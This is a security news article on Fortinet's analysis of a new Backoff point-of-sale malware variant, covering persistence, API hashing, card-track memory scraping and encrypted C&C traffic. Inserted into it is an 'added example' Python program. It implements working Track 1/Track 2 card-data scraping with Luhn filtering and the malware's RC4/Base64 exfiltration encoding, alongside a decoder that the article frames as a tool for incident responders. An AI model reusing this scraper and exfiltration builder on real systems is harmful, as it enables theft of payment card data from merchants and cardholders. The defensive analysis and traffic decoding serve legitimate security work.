New Version of Backoff PoS Malware Appears: Fortinet

Researchers at Fortinet said they have encountered a new version of the notorious Backoff malware targeting point-of-sale systems.

Backoff has been at the center of much of the data breach news this year. In August, the U.S. Secret Service estimated more than 1,000 businesses in the country had been infected.

According to Fortinet, unlike previous versions, the latest edition no longer uses a version number in the malware body. Instead, it uses the version name ROM. While it works very similarly to previous versions, changes have been made to make analysis and detection more difficult.

“During the installation phase,” blogged Fortinet’s Hong Kei Chan, “Backoff drops a copy of itself on the infected machine and creates a number of autorun registry entries to ensure persistence. This latest version is no different, but instead of disguising itself as a Java component as with previous versions, it pretends to be a media player with the file name mplayerc.exe.”

“In addition, unlike previous versions where the CopyFileA API is called to drop a copy of itself, ROM calls the WinExec API,” the researcher continued. “The command line used is shown in the following figure. To hinder the analysis process, the malware author utilizes a very common technique by replacing API names with the hashed values, and a custom hashing function is called to look up the API name with the equivalent hash value.”

The card-stealing functionality is largely unchanged: the malware still scrapes memory for both Track 1 and Track 2 magnetic-stripe data. This version adds two features, however: the names of blacklisted processes are stored as hashes rather than plaintext strings, and the stolen card data is written to the local file system, the researcher noted.

Changes have also been made to the command-and-control (C&C) communication to avoid detection. The malware now talks to the C&C server over port 443 with the traffic encrypted, which makes network-level detection harder. The field names in the query string have also been changed, and the contents of some fields carry an additional layer of Base64 encoding.

“The stolen credit card data is still encoded with RC4 and Base64, but the algorithm for generating the RC4 key has been slightly modified,” the researcher wrote. “Previously, the RC4 key was produced from three components: (1) a randomly generated seven-character string, (2) a hardcoded string, and (3) the user logon name and computer name (e.g. “bot @ FTNT”) that were concatenated and then hashed with an MD5 algorithm. In the new version, there is a slight modification in the concatenated strings.”
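To make the Track 1/Track 2 scraping and the exfil encoding concrete, and because an analyst who has the hard-coded string from a sample can decode captured traffic, the following added example walks both: it scrapes constructed memory for track data, derives the RC4 key the way the quote describes (seed, hard-coded string and "user @ computer" concatenated and MD5-hashed), encodes the data with RC4 and Base64, and decodes it again. This is example code written for this article, not Fortinet's or Backoff's. Assumptions the page does not settle: the track layouts are the generic ISO 7813 ones, the concatenation order is the one the quote lists, the RC4 key is the raw 16-byte MD5 digest, and the hard-coded string, the query field names and the sample data are placeholders.

```python
"""
Track scraping plus the RC4/Base64 exfil encoding described for Backoff.
Added example. ASSUMPTIONS: key = MD5(seed + HARDCODED + "user @ computer")
as raw digest bytes; HARDCODED, field names and all sample data are
constructed placeholders, not values from the real malware.
"""
import base64
import hashlib
import random
import re
import string

HARDCODED = b"example-hardcoded-string"  # placeholder, not Backoff's

# Track 1: %B<PAN>^<NAME>^<YYMM>...?   Track 2: ;<PAN>=<YYMM>...?
TRACK1 = re.compile(rb"%B(\d{13,19})\^([^^]{2,26})\^(\d{4})[^?]{0,40}\?")
TRACK2 = re.compile(rb";(\d{13,19})=(\d{4})[^?]{0,30}\?")

# Constructed memory image: two valid test PANs plus one Luhn-invalid decoy.
MEMORY = (b"\x00junk\x01" + b"%B4111111111111111^DOE/JOHN^25121010000000000000?"
          + b"\x00more junk" + b";1234567890123456=25121010000000000?"
          + b"\x00" + b";5500000000000004=25121010000000000?" + b"\x00end")


def luhn_ok(pan: bytes) -> bool:
    """Luhn check; scrapers use it to drop false regex matches."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = ch - 0x30
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def scrape_tracks(buf: bytes) -> list:
    """Return Luhn-validated Track 1 and Track 2 records found in buf."""
    hits = [m for m in TRACK1.finditer(buf)] + [m for m in TRACK2.finditer(buf)]
    return [m.group(0) for m in hits if luhn_ok(m.group(1))]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same op."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def derive_key(seed: str, user: str, computer: str) -> bytes:
    """Key per the description: seed + hardcoded + bot id, then MD5."""
    bot_id = f"{user} @ {computer}".encode()
    return hashlib.md5(seed.encode() + HARDCODED + bot_id).digest()


def build_exfil(tracks, user, computer, seed=None) -> dict:
    """Bot side: RC4 then Base64 the data; Base64 the other fields too."""
    if seed is None:
        seed = "".join(random.choices(string.ascii_letters + string.digits, k=7))
    key = derive_key(seed, user, computer)
    blob = b"\n".join(tracks)
    b64 = lambda b: base64.b64encode(b).decode()
    return {"s": b64(seed.encode()),                       # seed, sent in clear
            "id": b64(f"{user} @ {computer}".encode()),    # bot identifier
            "d": b64(rc4(key, blob))}                      # encrypted tracks


def decode_exfil(query: dict) -> list:
    """Analyst side: with HARDCODED from the sample, re-derive the key."""
    seed = base64.b64decode(query["s"]).decode()
    user, computer = base64.b64decode(query["id"]).decode().split(" @ ", 1)
    key = derive_key(seed, user, computer)
    return rc4(key, base64.b64decode(query["d"])).split(b"\n")


if __name__ == "__main__":
    found = scrape_tracks(MEMORY)
    q = build_exfil(found, "bot", "FTNT")
    print(q)
    print(decode_exfil(q))
```

The key point for incident responders is that the seed and bot identifier travel with the message, so the only secret in the scheme is the hard-coded string; once it is pulled from a sample, every capture of that variant's traffic can be decoded. The same property means the encoding offers the attacker no confidentiality against a defender who has the binary, only evasion of signature-based detection.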

The new version also no longer supports keylogging.

“The functions of ROM are very similar to the version preceding it, but modifications have been made by the malware author for evading detection and hindering the analysis process,” the researcher noted.